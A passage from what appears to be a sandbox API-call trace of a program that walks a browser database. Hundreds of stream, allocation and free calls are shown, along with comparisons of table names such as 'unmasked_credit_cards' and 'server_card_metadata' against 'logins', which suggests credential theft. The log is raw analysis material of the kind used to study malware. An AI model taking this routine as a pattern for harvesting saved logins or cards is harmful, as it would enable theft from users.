libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.121] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x56ffd8 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x9d) returned 0x5d1978 [0590.121] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x56ffd8 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x21, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x9d) returned 0x5d1a20 [0590.121] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x36, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56b778 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x37, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x56b778) returned 0x0 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x148) returned 0x5d5128 [0590.122] LocalFree (hMem=0x56b778) returned 0x0 [0590.122] LocalFree (hMem=0x570078) returned 0x0 [0590.122] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.122] lstrcmpiA (lpString1="unmasked_credit_cards", lpString2="logins") returned 1 [0590.122] LocalFree (hMem=0x58d970) returned 0x0 [0590.122] LocalFree (hMem=0x5d1978) returned 0x0 [0590.122] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.122] LocalFree (hMem=0x58d548) returned 0x0 [0590.122] LocalFree (hMem=0x5d5128) returned 0x0 [0590.122] LocalFree (hMem=0x56fe98) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x6895, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x6895, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x6896, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x6897, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.122] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.122] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x57ea78, libOffset=0x6898, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.122] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.122] LocalFree (hMem=0x2f09968) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.122] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.122] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.122] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.123] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x9c) returned 0x5d1a20 [0590.123] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x20, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x9c) returned 0x5d1978 [0590.123] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x34, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x11d) returned 0x5d5128 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x5ec250, libOffset=0x35, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:SetSize (This=0x5ec250, libNewSize=0x5d5128) returned 0x0 [0590.123] LocalAlloc (uFlags=0x40, uBytes=0x125) returned 0x2f09968 [0590.123] LocalFree (hMem=0x5d5128) returned 0x0 [0590.123] LocalFree (hMem=0x56fe98) returned 0x0 [0590.123] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.123] lstrcmpiA (lpString1="server_card_metadata", lpString2="logins") returned 1 [0590.123] LocalFree (hMem=0x58d548) returned 0x0 [0590.123] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.123] LocalFree (hMem=0x5d1978) returned 0x0 [0590.123] LocalFree (hMem=0x58d970) returned 0x0 [0590.123] LocalFree (hMem=0x2f09968) returned 0x0 [0590.123] LocalFree (hMem=0x570078) returned 0x0 [0590.123] LocalFree (hMem=0x2ef98e0) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0xb000, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0xb000, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8b) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0xb001, cb=0x0, dwLockType=0x0) returned 0x0 [0590.123] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.123] IStream:LockRegion (This=0x57ea78, libOffset=0xb003, cb=0x0, dwLockType=0x0) returned 0x0 [0590.124] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.124] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.124] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.124] IStream:LockRegion (This=0x57ea78, libOffset=0xb005, cb=0x0, dwLockType=0x0) returned 0x0 [0590.124] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.124] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.124] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.124] IStream:LockRegion (This=0x57ea78, libOffset=0xb007, cb=0x0, dwLockType=0x0) returned 0x0 [0590.124] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8b) returned 0x0 [0590.124] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2ef98e0 [0590.124] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.124] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.124] IStream:LockRegion (This=0x57ea78, libOffset=0xb008, cb=0x0, dwLockType=0x0) returned 0x0 [0590.124] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb00a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb00c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb00e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb010, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb012, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb014, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb016, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb018, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb01a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb404, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb404, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb405, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0xb406, cb=0x0, dwLockType=0x0) returned 0x0 [0590.132] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.132] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.132] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.132] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x57ea78, libOffset=0xb407, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.133] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.133] LocalFree (hMem=0x2f09968) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.133] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d548 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x58d548) returned 0x0 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0590.133] LocalFree (hMem=0x58d548) returned 0x0 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d548 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x1c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, libNewSize=0x58d548) returned 0x0 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0590.133] LocalFree (hMem=0x58d548) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x2c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.133] IStream:SetSize (This=0x5ec250, 